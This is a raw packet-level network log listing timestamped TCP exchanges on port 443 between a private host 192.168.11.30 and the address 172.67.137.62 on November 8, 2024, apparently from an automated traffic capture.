                                                                                                                          Nov 8, 2024 10:59:45.042244911 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.043508053 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.043514967 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.044651985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.044651985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.044651985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.044651985 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.044663906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.044687986 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.045698881 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.045710087 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.046036005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.046045065 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.047319889 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.047327042 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.047501087 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.047509909 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.047671080 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.049015999 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.049103975 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.049190998 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.049345016 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.049354076 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.050331116 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.050338030 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.050504923 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.050513983 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.050580978 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.050822020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.052517891 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.052525043 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.052764893 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.052774906 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.052901983 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.053836107 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.053844929 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.054017067 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.054025888 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.054090977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.054362059 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.055552006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.055558920 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.055718899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.055779934 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.055779934 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.055804968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.055861950 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.057967901 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.057976961 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.058137894 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.058146954 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.058197975 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.058197975 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.058305025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.059904099 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.059911013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.060239077 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.060944080 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.060944080 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.060954094 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.061125040 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.113841057 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.243269920 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.243453979 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.243571997 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.243662119 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.243670940 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.243969917 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.245028973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.245038986 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.245311022 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.245316029 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.245454073 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.246754885 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.246763945 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.247015953 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.247025013 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.247109890 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.247253895 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.248759985 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.248769045 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.248950005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.249053001 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.249058962 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.249078035 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.249248981 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.249842882 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.249852896 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.250039101 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.250052929 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.250057936 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.250144005 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.250444889 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.250762939 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.250853062 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.251238108 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.251245022 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.251590014 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.252432108 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.252441883 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.252619028 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.252692938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.252696991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.252811909 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.252916098 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.254220963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.254230022 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.254620075 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.254626036 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.255045891 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.256700039 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.256710052 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.256880999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.256957054 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.256963968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.257061958 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.257100105 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.257111073 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.257257938 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.257262945 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.257277966 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.257335901 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.257492065 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.257996082 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.258219957 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.258362055 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.258367062 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.259862900 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.259871960 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.260054111 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.260063887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.260181904 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.261518955 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.261528015 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.261730909 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.261737108 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.261950016 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.263268948 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.263277054 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.263508081 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.263514042 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.263706923 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.264379978 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.264389992 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.264600039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.264605999 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.264796972 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.265187025 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.266094923 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.266103029 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.266371965 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.266376972 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.267926931 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.267935991 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.268088102 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.268093109 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.268177032 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.268255949 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.269788027 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.269795895 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.269979954 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.270179033 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.270184040 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.271545887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.271555901 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.271749020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.271754980 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.271819115 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.271922112 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.272768021 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.272775888 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.272938013 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.273014069 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.273017883 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.273139954 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.274482012 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.274491072 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.274947882 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.274952888 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.276247025 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.276253939 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.276436090 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.276442051 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.276510000 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.276654959 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.277960062 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.277971983 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.278100014 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.278280020 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.278285027 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.279340029 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.279349089 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.279488087 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.279491901 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.279567003 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.279710054 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.280863047 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.280870914 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.281100035 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.281228065 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.281229973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.281712055 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.282738924 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.282747030 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.283013105 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.283016920 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.284507036 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.284516096 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.284738064 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.284743071 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.284816027 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.285842896 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.285851002 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.285963058 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.285968065 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.286144972 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.286150932 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.286431074 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.287230968 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.287237883 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.287441969 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.287446976 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.287561893 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.287714958 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.289325953 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.289334059 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.289681911 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.289686918 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.289865971 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.290980101 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.290987015 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.291165113 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.291169882 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.291266918 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.291485071 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.292726994 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.292735100 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.292927980 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.292933941 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.293019056 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.293242931 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.293684006 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.293692112 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.293997049 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.294002056 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.294061899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.294153929 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.295660019 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.295667887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.295826912 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.295983076 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.295988083 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.296190977 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.297399044 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.297405958 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.297625065 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.297630072 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.297714949 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.297818899 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.299211979 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.299220085 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.299432039 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.299436092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.299520969 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.299756050 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.301218987 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.301225901 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.301418066 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.301521063 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.301525116 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.301887989 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.302149057 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.302160025 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.302318096 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.302381992 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.302385092 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.302473068 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.302615881 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.303879023 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.303886890 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.304085970 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.304090977 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.304176092 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.304280043 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.305654049 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.305660963 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.305864096 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.305953979 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.305957079 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.306073904 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.307380915 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.307388067 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.307543993 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.307643890 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.307647943 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.307857990 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.308722973 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.308729887 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.308948040 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.308952093 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.309037924 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.309154987 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.310434103 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.310441017 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.310635090 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.310640097 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.310714960 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.310883999 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.312129974 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.312138081 CET44349754172.67.137.62192.168.11.30
                                                                                                                          Nov 8, 2024 10:59:45.312275887 CET49754443192.168.11.30172.67.137.62
                                                                                                                          Nov 8, 2024 10:59:45.312354088 CET49754443192.168.11.30172.67.137.62
